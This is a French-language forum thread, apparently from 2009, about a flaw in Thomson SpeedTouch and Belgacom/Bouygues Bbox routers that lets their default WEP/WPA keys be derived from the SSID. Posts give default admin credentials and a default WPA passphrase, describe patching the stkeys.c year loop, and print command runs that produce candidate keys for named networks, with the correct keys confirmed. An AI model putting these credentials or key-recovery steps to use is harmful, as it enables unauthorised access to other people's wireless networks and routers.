|
|||
|
Pour info, l'ISP "skynet" - venant du fournisseur de telephone traditionel en Belgique (Belgacom) - utilise les mêmes boitiers. Je n'ai pas eu l'occasion de faire des tests approfondis mais tout semble indiquer que la même faille est exploitable...
|
|
|||
|
Pour ceux que ca interresse, voici les sources de stkeys.c
Quote:
|
|
|||
|
J'ai eu l'opportunité de testé mais durant très peu de temps. Le SSID etait BBOX2. La connection se faisait bien donc la clé WPA était bonne. Par contre, je n'avais pas acces au réseau: wireshark me donnait un protocol EAPOL. Je pense, mais je ne suis pas sur, qu'il s'agit de 802.1X. Je ne comprends pas comment c'est possible: je serait surpris qu'il y ait un radius serveur dans la BBOX! Comme je n'ai pas eu l'autorisation de chipoter dans la config du routeur, je n'en sais pas plus et je n'aurai sans doute pas l'occasion d'essayer à nouveau. Si qq un a un access à une BBOX de Belgacom...on pourrait chercher un peu plus!
|
|
|||
|
Salut
Quote:
Pour le Eapol, d'après Wikipedia le protocole EAP est utilisé par le cryptage WPA/WPA2 même sans Radius, et si tu sniffes un réseau crypté avec WPA, tu verras ce genre de paquets aussi (en tout cas avec CCMP, TKIP chui pas sûr).Quote:
Au passage, le SSID "Bbox2" ne m'a pas l'air d'être celui par défaut (normalement il faut toute une partie en hexa à la fin)
|
|
|||
|
J'ai quelques infos sur ces box Belgacom, pour ceux que ça intéresse.
Le SSID par défaut est de la forme : bbox2-xxxx (x étant un caractère hexa). Le login par défaut : admin Le password par défaut : BGCVDSL2 La passphrase WPA par défaut sur ces box est : 466173743334782d536167656d (ascii: Fast34x-Sagem) |
|
|||
|
'Soir!
![]() C'est simple dans le code original de Kevin Devine, du 15 Mars 2008 (il n'est plus publié par l'auteur...), nous avons : // generate values only for 2005/2006..change if you want. for(year = 5;year <= 6;year++) { ... } On change le code (critique) en : // 2000-2020 for(year = 0;year <= 20;year++) { ... } En clair (et FORT pour un certain Mickey!) la "DATE" est la date de mise en service de la box. En changeant simplement le code de Kevin, on parcourt toutes les années de 2000 à 2020. Et oui, il y a toujours en circulation des SpeedTouch, sortis <2006 et aujourd'hui. Et je n'ai pas envie de recompiler le code chaque année comme certains... Routeur Thomson WiFI en France (et ailleurs) : - SpeedTouchXXXXXX (SFR-Cegetel) - Bbox-XXXXXX (Bouygues) - ESSID-XXXXXX (toutes les box du même style... on tente sa chance!) -- Bbox-A5018A (WEP/WPA) : root@nexus:/home/nexus6/tmp/speedtouch# ./stkeys -i A5018A -v Generating keys..please wait Serial Number Year 2002: CP0204**FM7 - potential key = 78EAF3EBC9 Serial Number Year 2005: CP0551**9GR - potential key = 705919B477 Serial Number Year 2009: CP0915**846 - potential key = 1ADE636C45 Serial Number Year 20012: CP0<22**XYW - potential key = 432F205B72 Serial Number Year 20012: CP0<50**RR4 - potential key = 4853980944 Serial Number Year 20018: CP0204**FM7 - potential key = 78EAF3EBC9 Found 6 potential keys. 1ADE636C45 est bien la clé pour 2009 (date de mise en service de la box) -- SpeedTouch83EB3D (WEP/WPA) : root@nexus:/home/nexus6/tmp/speedtouch# ./stkeys -i 83EB3D -v Generating keys..please wait Serial Number Year 2006: CP0646**MD9 - potential key = 152BCBDCB5 Serial Number Year 20012: CP0<04**09J - potential key = 0181EF4CBE Serial Number Year 20014: CP0>33**Z47 - potential key = 0282659A45 Found 3 potential keys. 152BCBDCB5 est bien la clé pour 2006 (date de mise en service de la box) -- theblackcat-32049D : root@nexus:/home/nexus6/tmp# ./stkeys -i 32049D -v Generating keys..please wait Serial Number Year 2000: CP0046**OT6 - potential key = 762089A857 Serial Number Year 2004: CP0452**4UL - potential key = 7173FFEBCE Serial Number Year 2007: CP0741**AAO - potential key = 7BDAB6E1D1 Serial Number Year 20016: CP0046**OT6 - potential key = 762089A857 Serial Number Year 20020: CP0452**4UL - potential key = 7173FFEBCE Found 5 potential keys. 7BDAB6E1D1 est bien la clé pour 2007 (date de mise en service de la box) /Nexus6 -- hxxp://linux.zsolttech.com/speedtouch/ Last edited by Nexus6; 10-28-2009 at 11:50 PM. Reason: Correction noms essid! |
![]() |
| Bookmarks |
| Thread Tools | |
| Display Modes | |
|
|